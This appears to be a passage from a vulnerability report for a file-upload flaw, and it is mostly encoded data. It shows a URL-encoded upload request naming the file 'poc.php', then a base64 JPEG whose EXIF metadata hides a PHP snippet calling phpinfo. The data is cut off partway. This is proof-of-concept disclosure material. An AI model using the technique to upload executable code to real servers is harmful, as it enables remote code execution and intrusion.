%54%47%41%72%61%4d%6b%61%4a%6c%56%6b%7a%6d%6f%57%54%49%49%71%34%51%4d%47%6f%48%48%4a%4e%57%6e%71%61%51%6b%56%67%51%6f%4b%67%38%35%72%5a%30%6e%55%57%69%59%52%4d%63%67%0a%38%35%4e%5a%42%51%42%69%63%63%30%41%6c%57%79%70%49%4e%65%70%67%38%5a%4b%6c%4a%57%65%68%6e%56%6f%71%61%4f%39%69%6c%45%69%35%42%71%52%52%58%4d%61%54%71%76%6c%6e%79%35%54%2b%4e%64%4a%46%4b%72%72%6b%45%45%56%39%74%67%4d%5a%47%70%46%0a%58%65%70%34%74%61%6b%34%79%4a%4d%63%30%6f%37%30%6d%63%39%4d%59%6f%42%7a%6d%76%53%62%5a%6b%4f%6f%70%4d%30%5a%70%58%59%57%48%55%55%55%56%59%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%53%55%55%41%46%47%4b%4b%54%74%53%53%0a%75%41%74%4e%50%51%2f%53%6c%7a%78%54%48%62%43%6b%39%67%4b%69%70%4e%52%69%37%6a%53%31%73%63%7a%34%6b%66%35%6f%77%50%57%75%63%63%59%4e%61%4f%72%33%4a%6c%76%53%41%63%67%47%73%34%38%6d%76%67%63%78%71%63%31%56%32%50%6f%4d%46%46%78%69%0a%4a%6a%35%53%61%6b%69%36%30%77%63%6a%46%54%49%4b%38%71%52%32%4d%6d%53%72%53%48%69%71%79%44%6d%72%43%39%4b%35%35%48%4c%4d%6d%54%49%4e%54%4b%32%54%69%6f%6c%35%46%54%4a%77%4f%6c%5a%4d%77%61%4a%45%36%47%6c%58%76%54%51%61%63%66%61%73%0a%57%5a%32%48%67%30%6f%4e%4d%48%53%67%44%6e%72%54%54%73%54%59%6b%42%70%43%54%53%41%59%70%4f%39%4f%39%78%4e%44%73%34%6f%33%55%6d%61%4d%30%58%45%4b%44%54%63%38%30%6f%50%57%6d%6b%30%72%33%47%6b%47%61%54%50%4e%4c%54%65%78%6f%73%56%59%0a%55%55%30%30%43%6b%7a%56%4a%46%49%51%30%77%6b%5a%70%2b%65%4b%5a%36%30%50%63%6f%44%79%52%54%53%4b%4f%2b%61%55%38%69%72%51%30%52%34%7a%6d%6f%6d%51%59%4e%54%73%4d%43%6f%32%47%51%61%75%4c%4e%49%73%71%75%76%4e%52%73%43%4f%67%79%61%73%0a%73%50%61%6f%69%75%54%57%79%62%53%30%4e%6b%31%62%55%67%49%4f%4d%6a%68%71%31%39%4d%31%49%77%73%49%35%57%50%50%48%57%73%74%68%69%6d%44%48%59%6e%4e%64%2b%44%78%30%36%55%6c%72%6f%59%31%71%43%6b%72%6f%37%79%47%56%5a%41%43%44%31%71%64%0a%65%39%63%54%61%61%6e%50%61%75%41%53%53%75%65%63%6d%75%6f%74%4c%31%4c%68%51%77%62%6e%48%49%72%37%4c%42%5a%6c%47%70%47%7a%65%70%35%46%58%44%75%4c%75%61%46%46%4d%44%5a%47%52%52%6b%69%76%59%6a%4a%53%56%30%63%31%72%61%45%6c%46%46%4a%0a%32%71%67%44%49%70%61%53%67%55%41%4c%52%52%52%51%41%55%5a%70%4f%31%47%61%56%77%41%39%61%4b%4b%4b%47%77%45%7a%52%6d%6a%71%4b%61%53%42%53%75%6f%71%37%46%71%33%5a%43%6b%67%64%61%7a%4e%54%76%55%68%69%5a%51%32%47%49%34%46%4c%66%61%69%0a%6c%74%47%53%43%4d%31%79%56%35%64%53%33%4d%70%6b%4c%48%47%4f%42%58%67%35%6a%6a%31%47%4c%55%57%64%75%47%77%37%6c%4a%4e%6c%5a%33%4d%6a%75%57%2b%38%54%78%55%66%58%70%53%37%2b%65%6e%4e%43%67%35%72%34%2b%74%56%35%70%4e%6e%76%30%6f%38%0a%73%62%44%6c%55%67%38%69%70%6f%77%52%54%56%55%69%70%6c%46%59%53%59%53%6c%30%48%6f%4b%6e%48%54%69%6f%6c%42%34%78%55%36%44%69%75%65%52%7a%79%4a%59%2b%6c%50%42%41%4f%4b%6a%55%34%70%77%35%4f%61%79%65%70%67%79%55%45%65%74%50%7a%6b%56%0a%45%70%47%61%6b%7a%55%57%52%4c%51%38%45%59%6f%35%70%6f%4e%4c%6d%70%61%4a%61%48%41%34%48%4e%47%51%54%6d%6d%35%70%52%30%4e%53%54%59%55%6b%5a%36%30%5a%48%72%54%54%31%6f%7a%54%51%57%46%79%42%31%70%4d%35%36%55%68%36%55%44%37%74%4e%4a%0a%44%53%46%37%55%6d%65%43%4b%64%54%54%33%71%6b%4d%51%55%33%50%57%6e%44%76%53%45%55%72%74%4d%61%45%4a%34%4e%4e%50%65%6c%50%51%30%30%39%54%54%4b%45%37%55%69%39%65%61%57%6b%46%57%55%42%47%65%6c%52%39%42%55%68%70%68%36%30%31%6f%4e%61%0a%45%62%43%6d%59%41%42%7a%31%71%51%69%6f%79%44%6d%74%6f%76%51%30%54%36%45%54%6a%50%53%6f%63%44%42%7a%77%61%73%45%47%6d%6b%44%48%53%72%55%6a%57%4c%30%73%56%31%4a%47%63%38%31%62%74%72%70%37%59%67%6f%63%35%50%49%71%45%72%6e%49%48%57%0a%6d%46%54%32%37%56%76%52%78%4d%71%55%72%70%6b%56%4b%61%6b%6a%72%72%48%55%59%35%55%43%73%32%47%50%55%56%70%71%51%52%77%61%34%4b%4b%56%6b%59%59%59%68%68%30%72%64%30%2f%56%75%41%6b%78%78%37%31%39%5a%67%4d%33%69%30%6c%4e%6e%6b%56%73%0a%4d%30%37%6f%36%4f%6a%4a%78%52%52%58%30%35%78%42%6a%69%6a%50%57%6c%70%50%57%67%41%6f%6f%6f%6f%41%51%35%78%78%31%70%4d%34%34%50%57%68%69%41%43%63%34%48%72%56%52%72%32%47%4d%6e%63%34%34%72%4f%64%53%4d%4e%78%71%4c%65%78%62%79%50%78%0a%6f%4c%41%44%6b%31%69%33%47%75%77%52%73%51%47%42%4f%4b%79%37%6a%78%42%4d%35%49%69%47%52%58%6e%56%38%78%68%41%32%6a%51%6b%7a%71%47%6e%56%43%63%73%41%50%63%31%6b%36%6a%72%45%63%53%73%71%45%46%7a%30%72%6e%70%62%36%65%62%4a%64%79%76%0a%34%31%56%4c%67%38%73%53%66%65%76%47%72%35%77%35%4a%70%48%62%52%77%57%74%32%54%58%4e%79%38%37%45%6c%69%51%66%65%71%78%4a%4f%42%6b%34%41%70%32%42%31%46%41%41%50%4e%66%50%56%36%38%71%6b%6d%32%7a%31%71%64%4b%4d%45%4e%41%39%71%6c%55%0a%43%6b%43%31%49%71%31%79%4e%74%61%6c%4f%58%51%63%41%43%4d%56%49%6f%46%4e%55%56%49%71%31%4c%6c%63%79%6b%79%52%63%59%71%55%44%49%71%4e%56%71%56%54%67%56%6d%39%54%47%54%46%41%70%77%47%42%53%65%39%4c%6d%73%7a%4a%69%67%38%31%49%44%78%0a%6d%6f%73%38%30%34%48%69%70%41%66%75%49%70%64%33%30%70%6f%36%47%6c%71%57%53%30%4c%6b%2b%67%70%51%35%36%59%70%6f%36%34%70%77%46%54%59%6b%58%4a%4a%6f%7a%69%6b%78%7a%51%65%6c%57%6b%41%76%4a%36%30%6f%41%39%61%4f%32%61%51%39%43%4b%64%0a%67%46%79%41%4f%74%4e%7a%6b%30%63%30%67%47%44%52%59%42%77%41%48%65%6b%4a%39%4b%52%6a%67%55%6d%43%42%6d%6f%36%6a%51%68%7a%69%6d%38%30%2f%49%78%69%6d%6b%56%5a%51%33%71%4b%41%4b%58%46%4c%56%44%51%7a%69%6d%6e%32%70%78%58%6b%30%67%58%0a%6d%6c%63%45%78%70%48%47%65%39%4d%41%4a%42%70%37%64%63%55%6d%43%42%78%57%71%64%6b%57%6d%52%6b%48%30%71%4a%69%52%6e%67%56%4d%51%61%59%56%6f%54%4e%49%73%69%49%79%44%54%4d%45%5a%71%63%71%41%43%61%6a%49%48%4e%57%6d%74%6d%57%6e%71%51%0a%6c%63%6e%50%51%2b%74%4f%44%46%52%79%63%2b%39%4b%51%63%38%55%68%41%78%7a%57%6b%57%31%73%78%75%4b%65%35%2f%2f%32%51%3d%3d%0a&path=&name=poc.php ``` and here a copy of the image urldecoded: ``` data:image/jpeg;base64,/9j/4QB2RXhpZgAATU0AKgAAAAgABQEaAAUAAAABAAAASgEbAAUAAAABAAAAUgEoAAMAAAABAAIA AAE7AAIAAAAUAAAAWgITAAMAAAABAAEAAAAAAAAAAABIAAAAAQAAAEgAAAABPD9waHAgcGhwaW5m bygpOyA/PgD/2wCEAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwc KDcpLDAxNDQ0Hyc5PTgyPC4zNDIBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMv/AABEIAZABkAMBIgACEQEDEQH/xAGiAAABBQEB AQEBAQAAAAAAAAAAAQIDBAUGBwgJCgsQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQci cRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZHSElKU1RVVldYWVpj ZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfI ycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+gEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcI CQoLEQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEK FiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SF hoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo 6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APf6KKKACjtRRQA09DS0h6GlFIAopO1LkAdaYWGkCgAC jg0hFJuQcwuaMjNNHpTJJUQfMwGPU1DqRirthG8iQ4xyKTK4z/OsW/1yO3BCMGPtWDda9cXByrGM AYwO/vXn18yp007M3jh3I7C4v4Lf/WyqPxrOm1+2iBIO70xXHSyyztl3L/U1FkE4GeOOa8ivnDex 2U8E2tTqX8VQHIEbE+uDUD+JFI+RcH3rBUEDoMfSk8oE5Irz5ZpKW5ssHY1X8QXJPAXH0qJtbuW7 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 